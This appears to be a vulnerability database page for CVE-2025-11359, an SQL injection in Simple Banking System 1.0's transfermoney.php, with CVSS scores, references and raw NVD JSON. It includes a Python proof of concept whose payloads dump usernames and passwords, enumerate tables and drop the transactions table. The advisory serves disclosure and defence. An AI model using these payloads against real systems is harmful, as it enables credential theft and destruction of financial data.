CVE-2025-11359

Description

A security vulnerability has been detected in code-projects Simple Banking System 1.0. The affected element is an unknown function of the file /transfermoney.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:codeastro:simple_banking_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Simple Banking System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11359 - Simple Banking System SQL Injection PoC
# Vulnerability: SQL Injection in /transfermoney.php via ID parameter
# Author: Security Researcher

import requests
import sys

TARGET_URL = "http://target.com/transfermoney.php"
USERNAME = "testuser"
PASSWORD = "testpass"

def exploit_sql_injection(target_url, session_cookie, injection_payload):
    """
    Exploit SQL injection in the ID parameter of transfermoney.php
    """
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    
    # Inject malicious SQL payload into the ID parameter
    data = {
        "ID": injection_payload,
        "amount": "100",
        "submit": "Transfer"
    }
    
    response = requests.post(target_url, headers=headers, data=data)
    return response.text

# Step 1: Login to obtain session
session = requests.Session()
login_data = {"username": USERNAME, "password": PASSWORD}
session.post("http://target.com/login.php", data=login_data)

# Step 2: Test basic SQL injection
payloads = [
    "1' OR '1'='1",
    "1' UNION SELECT username,password FROM users-- -",
    "1' AND 1=1-- -",
    "1' AND (SELECT @@version)-- -",
    "1'; DROP TABLE transactions-- -"
]

for payload in payloads:
    print(f"[*] Testing payload: {payload}")
    result = exploit_sql_injection(TARGET_URL, session.cookies, payload)
    if "error" in result.lower() or "syntax" in result.lower():
        print(f"[+] SQL Injection confirmed with payload: {payload}")
        break

# Step 3: Extract database information using UNION-based injection
union_payload = "-1' UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- -"
data_extracted = exploit_sql_injection(TARGET_URL, session.cookies, union_payload)
print(f"[+] Extracted data: {data_extracted}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11359
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11359
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11359/
[4] VulDB https://vuldb.com/cve/CVE-2025-11359
[5] https://code-projects.org/
[6] https://github.com/ceeeeb-hao/cve/issues/1
[7] https://vuldb.com/?ctiid.327246
[8] https://vuldb.com/?id.327246
[9] https://vuldb.com/?submit.666731

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11359", "sourceIdentifier": "[email protected]", "published": "2025-10-07T09:15:33.530", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in code-projects Simple Banking System 1.0. The affected element is an unknown function of the file /transfermoney.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:simple_banking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "82D034EC-9EA5-4594-8961-92AD4757D883"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ceeeeb-hao/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.327246", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327246", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.666731", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}